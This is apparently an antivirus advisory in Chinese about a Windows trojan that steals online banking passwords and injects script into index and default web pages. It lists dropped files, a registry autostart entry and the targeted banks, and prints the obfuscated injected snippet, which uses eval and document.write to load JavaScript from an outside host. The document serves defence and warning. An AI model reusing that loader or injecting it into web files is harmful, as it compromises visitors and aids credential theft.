病毒類型
木馬程式病毒影響系統:WinNTWin2000WinXPWin2003
病毒行為
這是一個會盜取用戶信息的木馬程式。病毒運行後,將隱蔽安裝到用戶計算機,並增加啟動項以自啟動。病毒通過運行一個隱藏的SoundMan.exe進程,監控用戶是否打開了
指定的網上銀行網址,如果是則監控用戶滑鼠狀態,盜取用戶銀行帳號密碼等信息,並傳送至黑客信箱。請廣大使用網上銀行的用戶注意目錄下是否存在該病毒檔案,以便預防。
另外,該病毒還會修改硬碟中檔案名稱為"index.*"和"default.*"的網頁檔案,插入病毒代碼,並下載大量隱蔽軟體安裝至用戶電腦,使用戶計算機安全受到危脅。
1.生成檔案
%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\dll.fnr
%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\eAPI.fne
%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\eCompress.fne
%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\eImgConverter.fne
%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\eLIB.fne
%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\HideProc.dll
%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\internet.fne
%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\krnln.fnr
%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\mon
%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\moz
%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\Nhook.dll
%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\shell.fne
%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\SOUNDMAN.EXE
2.註冊表項
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunSoundNan"%commonfiles%\MicrosoftShared\webserverextensions\40\bots\vinavbar\SOUNDMAN.EXE"
3.修改硬碟中檔案為"index.*"和"default.*"的網頁檔案
index.asp
index.jsp
index.php
index.htm
index.html
default.asp
default.jsp
default.php
default.htm
default.html
並插入以下腳本
t="60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,99,115,46,99,115,107,105,99,107,46,99,110,47,99,115,47,115,99,46,106,115,62,60,47,115,99,114,105,112,116,62"
t=eval("String.fromCharCode(" t ")");
document.write(t);
4.盜取以下網上銀行用戶信息,並傳送至黑客信箱
招商銀行網上支付中心
招商銀行一網通-個人銀行大眾版
中國農業銀行
中信銀行網上銀行
公司銀行介紹_中信金融網
浦東發展銀行
5.嘗試連線遠程伺服器,下載大量隱蔽軟體安裝至用戶計算機
